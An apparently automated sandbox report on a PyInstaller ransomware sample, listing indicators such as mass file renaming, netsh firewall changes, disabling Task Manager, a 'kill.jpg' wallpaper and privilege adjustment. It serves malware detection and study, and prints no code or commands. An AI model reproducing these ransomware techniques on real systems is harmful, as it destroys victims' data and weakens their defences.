Malware Analysis Report

2025-06-15 20:56

Sample ID 240525-3qg92sfe54
Target ByteVaultX 2.0.exe
SHA256 1a21a8954832306df2f9ff1b2296fbee0a079b019d3ef511ef6ec278fa9084e5
Tags: evasion execution ransomware pyinstaller
Score: 10/10


Analysis Overview

Score: 10/10

SHA256: 1a21a8954832306df2f9ff1b2296fbee0a079b019d3ef511ef6ec278fa9084e5

Threat Level: Known bad

The file ByteVaultX 2.0.exe was found to be: Known bad.

Malicious Activity Summary

evasion execution ransomware pyinstaller

Renames multiple (132) files with added filename extension

Renames multiple (156) files with added filename extension

Renames multiple (142) files with added filename extension

Modifies Windows Firewall

Blocklisted process makes network request

Disables Task Manager via registry modification

Checks computer location settings

Loads dropped DLL

Drops desktop.ini file(s)

Command and Scripting Interpreter: PowerShell

Command and Scripting Interpreter: PowerShell

Sets desktop wallpaper using registry

Drops file in Windows directory

Unsigned PE

Detects Pyinstaller

Enumerates physical storage devices

Suspicious use of SetWindowsHookEx

Suspicious use of WriteProcessMemory

Suspicious use of FindShellTrayWindow

Enumerates system info in registry

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of SendNotifyMessage

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: MapViewOfSection

Modifies registry class

Suspicious behavior: EnumeratesProcesses

Modifies Internet Explorer settings

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported: 2024-05-25 23:42

Signatures

Detects Pyinstaller

pyinstaller
Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Unsigned PE

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Analysis: behavioral2

Detonation Overview

Submitted: 2024-05-25 23:42
Reported: 2024-05-26 00:00
Platform: win10v2004-20240508-en
Max time kernel: 970s
Max time network: 975s

Command Line

"C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe"

Signatures

Renames multiple (142) files with added filename extension

ransomware

Disables Task Manager via registry modification

evasion

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\SYSTEM32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A

Checks computer location settings

Description | Indicator | Process | Target
Key value queried | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe | N/A

Drops desktop.ini file(s)

Description | Indicator | Process | Target
File opened for modification | C:\Users\Admin\Music\desktop.ini | C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe | N/A
File opened for modification | C:\Users\Admin\Videos\desktop.ini | C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe | N/A
File opened for modification | C:\Users\Admin\Downloads\desktop.ini | C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe | N/A
File opened for modification | C:\Users\Admin\Documents\desktop.ini | C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe | N/A
File opened for modification | C:\Users\Admin\Pictures\desktop.ini | C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe | N/A
File opened for modification | C:\Users\Admin\Pictures\Camera Roll\desktop.ini | C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe | N/A
File opened for modification | C:\Users\Admin\Pictures\Saved Pictures\desktop.ini | C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe | N/A
File opened for modification | C:\Users\Admin\Desktop\desktop.ini | C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe | N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Sets desktop wallpaper using registry

ransomware
Description | Indicator | Process | Target
Set value (str) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" | C:\Windows\system32\reg.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" | C:\Windows\system32\reg.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" | C:\Windows\system32\reg.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" | C:\Windows\system32\reg.exe | N/A

Enumerates physical storage devices

Enumerates system info in registry

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A

Modifies registry class

Description | Indicator | Process | Target
Key created | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
